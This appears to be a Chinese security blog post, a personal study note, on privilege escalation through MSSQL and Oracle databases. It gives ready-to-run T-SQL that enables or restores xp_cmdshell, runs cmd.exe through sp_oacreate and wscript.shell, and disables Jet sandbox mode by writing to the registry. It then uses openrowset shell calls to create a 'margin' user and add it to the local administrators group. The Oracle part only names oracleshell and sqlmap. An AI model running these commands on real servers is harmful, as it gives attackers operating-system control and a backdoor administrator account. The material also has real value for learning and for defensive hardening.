type
status
date
slug
summary
tags
category
icon
password
0x00 mssql提权方式简介
1)xp_cmd_shell提权2)sp_oacreate提权3)沙盒提权
xp_cmd_shell提权
mssql2000中默认开启xpcmdshell 2005以后默认禁用
管理员 sa 权限则可以用 sp_configure 重修开启它
启用:
EXEC sp_configure 'show advanced options', 1
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
关闭:
exec sp_configure 'show advanced options', 1;
reconfigure;
exec sp_configure 'xp_cmdshell', 0;
reconfigure;
执行:
EXEC master.dbo.xp_cmdshell '命令'
如果 xp_cmdshell 被删除了,可以上传 xplog70.dll 进行恢复
exec master.sys.sp_addextendedproc 'xp_cmdshell', 'C:\Program Files\Microsoft SQL
Server\MSSQL\Binn\xplog70.dll'
sp_oacreate提权
主要是用来调用 OLE 对象,利用 OLE 对象的 run 方法执行系统命令。
启用:
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'Ole Automation Procedures', 1;
RECONFIGURE WITH OVERRIDE;
关闭:
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'Ole Automation Procedures', 0;
RECONFIGURE WITH OVERRIDE;
执行:
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod
@shell,'run',null,'c:\windows\system32\cmd.exe /c whoami >c:\1.txt'
沙盒提权
mssql自带沙盒,利用沙盒执行命令
开启沙盒,使用沙盒执行命令,
exec sp_configure 'show advanced options',1;reconfigure;
-- 不开启的话在执行 xp_regwrite 会提示让我们开启,
exec sp_configure 'Ad Hoc Distributed Queries',1;reconfigure;
--关闭沙盒模式,如果一次执行全部代码有问题,先执行上面两句代码。
exec master..xp_regwrite
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;
--查询是否正常关闭,经过测试发现沙盒模式无论是开,还是关,都不会影响我们执行下面的语句。
exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines',
'SandBoxMode'
-- 执 行 系 统 命 令 select * from
openrowset('microsoft.jet.oledb.4.0',';database=c:/windows/system32/ias/ias.mdb','select shell("net user
margin margin /add")')
select * from
openrowset('microsoft.jet.oledb.4.0',';database=c:/windows/system32/ias/ias.mdb','select shell("net
localgroup administrators margin /add")')
沙盒模式 SandBoxMode 参数含义(默认是 2)
0x01 oracle提权方式简介
这里采用自动化工具oracleshell 提权oracle数据库,前提条件也是获取到dba的最高权限权限,并且需要知道SID,通常与账号密码在一起。
可以使用sqlmap检测是否为dbs权限,返回ture则正确
工具oracleshell 直接连接 sql注入模式提权, 普通用户提权, dba权限提权三种权限
交流学习:CSND社区:告白热
- 作者:告白
- 链接:https://www.gbsec.top/article/%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87-mssql-oracle%E6%8F%90%E6%9D%83%E9%9A%8F%E7%AC%94
- 声明:本文采用 CC BY-NC-SA 4.0 许可协议,转载请注明出处。
相关文章